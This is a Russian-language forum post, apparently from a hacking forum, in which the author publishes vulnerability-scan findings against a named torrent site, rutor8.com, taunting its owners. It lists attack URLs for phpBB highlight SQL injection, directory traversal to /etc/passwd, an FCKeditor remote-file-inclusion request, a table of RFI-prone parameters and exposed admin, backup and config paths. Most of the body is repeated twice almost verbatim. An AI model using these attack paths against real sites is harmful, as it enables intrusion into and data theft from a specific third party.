- Автор
- Kleopatra
Недавно я решил отсканировать полностью форум "RuTOR"
и вот какие интересы я нашел, снизу я более подробнее распишу"
Ну что всеми любимый сайт рутор, сегодня "Kleopatra" Пройдусь по вашим уязвимым местам )
хочу начать с первой уязвимости а именно
1. "SQL Injection / Command Execution через phpBB" (Это известная уязвимость phpBB, использовавшаяся червём Santy.A, позволяет выполнять команды или SQL-инъекции через параметр highlight.)
/viewtopic.php?t=...highlight=2527... Сообщения:
phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm
2. Directory Listing через ?PageServices=
а именно : /?PageServices= или же The remote server may allow directory listings through Web Publisher ( Это позволяет злоумышленнику просматривать список файлов на сервере, если каталог не защищён.)
3. Открытые файлы конфигурации и карты директорий (Конфиденциальная информация, может использоваться для разведки атакующим.)
/cfdocs.map — может раскрывать пути внутри ColdFusion-сервера.
/server-status — доступ к Apache Server Status.
This reveals Apache information. Comment out appropriate line in the Apache conf file or restrict access
4. /upload.cgi — уязвимость на загрузку файлов ( Может привести к полной компрометации сервера, если загрузить shell или скрипт. )
The upload.cgi allows attackers to upload arbitrary files to the server.
5. /cgi-bin/pfdisplay.cgi?.../../../../etc/passwd (Попытка чтения системных файлов UNIX/Linux (в частности /etc/passwd) — признак уязвимости "directory traversal")\
Comes with IRIX 6.2-6.4; allows to read arbitrary config
6. Утечки информации через старые плагины/веб-сервисы (Эти сервисы либо устарели, либо подвержены DoS-атакам, либо раскрывают чувствительные данные.)
/cpqlogin.htm — Compaq WBEM Server.
/na_admin/ — Default Network Appliance server.
/counter1/.../123.gif — The Roxen Counter.
7. Exair Search ASP — уязвимость к DoS (Скрипт search.asp в Exair-пакете на IIS может использоваться для атаки типа Denial of Service (DoS).)
Scripts within the Exair package on IIS 4 can be used for a DoS
Вывод:
| Категория | Уязвимость | Риск |
| ------------------- | ------------------------------- | -------------- |
| SQLi / Command Exec | phpBB `highlight` | Критический |
| Файловые уязвимости | `/etc/passwd`, `/server-status` | Критический |
| File Upload | `upload.cgi` | Критический |
| Directory listing | `/PageServices`, `/publisher` | Средний |
| Утечка информации | `cfdocs.map`, WBEM | Умеренный |
| DoS vectors | Roxen, Exair | Средний |
и это еще не все !
Уязвимый компонент:
Почти все эти уязвимости исходят из компонента:
swift
Копировать
Редактировать
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
Это значит:
На сервере установлен устаревший FCKeditor
Параметры не фильтруются должным образом
Сервер принимает внешние URL как значения параметров, что опасно
Пример атаки:
bash
Копировать
Редактировать
.../connector.php?Dir=root=Для просмотра ссылки Войдиили Зарегистрируйся
Этот URL — классический пример атаки RFI: подключение удалённого скрипта с сайта blog.cirt.net, который используется как тестовый для выявления RFI (из "RSnake's RFI list").
| Уязвимость | Компонент | Уровень риска |
| --------------------------- | ----------- | ------------------ |
| RFI (Remote File Inclusion) | `FCKeditor` | **Критический** |
и еще уязвимости :
Remote File Inclusion (RFI)
...?param=Для просмотра ссылки Войдиили Зарегистрируйся
| Скрипт/Путь | Уязвимый параметр |
| ------------------------------------------------------------------- | ------------------------- |
| `prepare.php` | `xcart_dir` |
| `prepend.php` | `PX_config[manager_path]` |
| `preview.php` | `php_script_path` |
| `principal.php` | `conteudo` |
| `print.php` | `page`, `print` |
| `process.php` | `DEFAULT_SKIN` |
| `professeurs/index.php` | `repertoire_config` |
| `profil.php` | `config[root_ordre]` |
| `projects/weattimages/demo/index.php` | `in[langpack]` |
| `promcms/newspublish/include.php` | `path[bdocroot]` |
| `protection.php` | `logout_page` |
| `provider/auth.php` | `xcart_dir` |
| `psynch/nph-psa.exe` | `css` |
| `public_html/add-ons/modules/sysmanager/plugins/install.plugin.php` | `AURORA_MODULES_FOLDER` |
| `public_html/modules/Forums/favorites.php` | `nuke_bbroot_path` |
| `public_html/pub_blocks/activecontent.php` | `DragonRootPath` |
| `public_includes/pub_popup/popup_finduser.php` | `v` |
Найдены уязвимые параметры на rutor8.com, включая:
/template/Vert/index.php?pageAll=...
/editor/filemanager/browser/default/connectors/php/connector.php?Command=...
/templates/2blue/bodyTemplate.php?serverPath=...
/template/barrel/template.tpl.php?renderer=...
вот еще кое что интересное
.tools/phpMyAdmin/current/ – найдена директория phpMyAdmin — может дать доступ к БД.
/admin/install/phpinfo.php – файл phpinfo() раскрывает конфигурацию сервера.
/portal/binary/junk/, /portal/webservice/ – возможно, внутренние бинарные или SOAP-сервисы.
/console/login/LoginForm.jsp – форма входа Oracle WebLogic (уязвим к множеству CVE).
/servlet/snoopservlet, /servlet/hitcount – IBM Websphere демо-сервлеты (опасны, если активны).
/Admin/, /axis/services/, /imcws/services/ – Apache Axis / WebLogic endpoints.
Резервные/конфигурационные файлы:
web.config.bak, .orig, .swp и т.п. – backup’ы ASP-конфигов доступны извне, что критично.
/includes/connexion.inc – возможно, конфигурация подключения к БД.
/platform/, /jk-manager/html, /host-manager/html – Tomcat Web Manager доступен.
.svn/entries – содержит пути к директориям проекта (утечка структуры проекта).
Функциональность с потенциальным риском:
/getstatus – может возвращать системную информацию.
/wp-login.php?action=register – регистрация WordPress включена (можно злоупотребить).
/?s= – возможен LFI/RCE через параметр поиска.
/openadmin/ – интерфейс OpenAdmin (доступ к админке).
и вот какие интересы я нашел, снизу я более подробнее распишу"
Ну что всеми любимый сайт рутор, сегодня "Kleopatra" Пройдусь по вашим уязвимым местам )
хочу начать с первой уязвимости а именно
1. "SQL Injection / Command Execution через phpBB" (Это известная уязвимость phpBB, использовавшаяся червём Santy.A, позволяет выполнять команды или SQL-инъекции через параметр highlight.)
/viewtopic.php?t=...highlight=2527... Сообщения:
phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm
2. Directory Listing через ?PageServices=
а именно : /?PageServices= или же The remote server may allow directory listings through Web Publisher ( Это позволяет злоумышленнику просматривать список файлов на сервере, если каталог не защищён.)
3. Открытые файлы конфигурации и карты директорий (Конфиденциальная информация, может использоваться для разведки атакующим.)
/cfdocs.map — может раскрывать пути внутри ColdFusion-сервера.
/server-status — доступ к Apache Server Status.
This reveals Apache information. Comment out appropriate line in the Apache conf file or restrict access
4. /upload.cgi — уязвимость на загрузку файлов ( Может привести к полной компрометации сервера, если загрузить shell или скрипт. )
The upload.cgi allows attackers to upload arbitrary files to the server.
5. /cgi-bin/pfdisplay.cgi?.../../../../etc/passwd (Попытка чтения системных файлов UNIX/Linux (в частности /etc/passwd) — признак уязвимости "directory traversal")\
Comes with IRIX 6.2-6.4; allows to read arbitrary config
6. Утечки информации через старые плагины/веб-сервисы (Эти сервисы либо устарели, либо подвержены DoS-атакам, либо раскрывают чувствительные данные.)
/cpqlogin.htm — Compaq WBEM Server.
/na_admin/ — Default Network Appliance server.
/counter1/.../123.gif — The Roxen Counter.
7. Exair Search ASP — уязвимость к DoS (Скрипт search.asp в Exair-пакете на IIS может использоваться для атаки типа Denial of Service (DoS).)
Scripts within the Exair package on IIS 4 can be used for a DoS
Вывод:
| Категория | Уязвимость | Риск |
| ------------------- | ------------------------------- | -------------- |
| SQLi / Command Exec | phpBB `highlight` | Критический |
| Файловые уязвимости | `/etc/passwd`, `/server-status` | Критический |
| File Upload | `upload.cgi` | Критический |
| Directory listing | `/PageServices`, `/publisher` | Средний |
| Утечка информации | `cfdocs.map`, WBEM | Умеренный |
| DoS vectors | Roxen, Exair | Средний |
и это еще не все !
Уязвимый компонент:
Почти все эти уязвимости исходят из компонента:
swift
Копировать
Редактировать
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
Это значит:
На сервере установлен устаревший FCKeditor
Параметры не фильтруются должным образом
Сервер принимает внешние URL как значения параметров, что опасно
Пример атаки:
bash
Копировать
Редактировать
.../connector.php?Dir=root=Для просмотра ссылки Войди
Этот URL — классический пример атаки RFI: подключение удалённого скрипта с сайта blog.cirt.net, который используется как тестовый для выявления RFI (из "RSnake's RFI list").
| Уязвимость | Компонент | Уровень риска |
| --------------------------- | ----------- | ------------------ |
| RFI (Remote File Inclusion) | `FCKeditor` | **Критический** |
и еще уязвимости :
Remote File Inclusion (RFI)
...?param=Для просмотра ссылки Войди
| Скрипт/Путь | Уязвимый параметр |
| ------------------------------------------------------------------- | ------------------------- |
| `prepare.php` | `xcart_dir` |
| `prepend.php` | `PX_config[manager_path]` |
| `preview.php` | `php_script_path` |
| `principal.php` | `conteudo` |
| `print.php` | `page`, `print` |
| `process.php` | `DEFAULT_SKIN` |
| `professeurs/index.php` | `repertoire_config` |
| `profil.php` | `config[root_ordre]` |
| `projects/weattimages/demo/index.php` | `in[langpack]` |
| `promcms/newspublish/include.php` | `path[bdocroot]` |
| `protection.php` | `logout_page` |
| `provider/auth.php` | `xcart_dir` |
| `psynch/nph-psa.exe` | `css` |
| `public_html/add-ons/modules/sysmanager/plugins/install.plugin.php` | `AURORA_MODULES_FOLDER` |
| `public_html/modules/Forums/favorites.php` | `nuke_bbroot_path` |
| `public_html/pub_blocks/activecontent.php` | `DragonRootPath` |
| `public_includes/pub_popup/popup_finduser.php` | `v` |
Найдены уязвимые параметры на rutor8.com, включая:
/template/Vert/index.php?pageAll=...
/editor/filemanager/browser/default/connectors/php/connector.php?Command=...
/templates/2blue/bodyTemplate.php?serverPath=...
/template/barrel/template.tpl.php?renderer=...
вот еще кое что интересное
.tools/phpMyAdmin/current/ – найдена директория phpMyAdmin — может дать доступ к БД.
/admin/install/phpinfo.php – файл phpinfo() раскрывает конфигурацию сервера.
/portal/binary/junk/, /portal/webservice/ – возможно, внутренние бинарные или SOAP-сервисы.
/console/login/LoginForm.jsp – форма входа Oracle WebLogic (уязвим к множеству CVE).
/servlet/snoopservlet, /servlet/hitcount – IBM Websphere демо-сервлеты (опасны, если активны).
/Admin/, /axis/services/, /imcws/services/ – Apache Axis / WebLogic endpoints.
Резервные/конфигурационные файлы:
web.config.bak, .orig, .swp и т.п. – backup’ы ASP-конфигов доступны извне, что критично.
/includes/connexion.inc – возможно, конфигурация подключения к БД.
/platform/, /jk-manager/html, /host-manager/html – Tomcat Web Manager доступен.
.svn/entries – содержит пути к директориям проекта (утечка структуры проекта).
Функциональность с потенциальным риском:
/getstatus – может возвращать системную информацию.
/wp-login.php?action=register – регистрация WordPress включена (можно злоупотребить).
/?s= – возможен LFI/RCE через параметр поиска.
/openadmin/ – интерфейс OpenAdmin (доступ к админке).
- Источник
- legion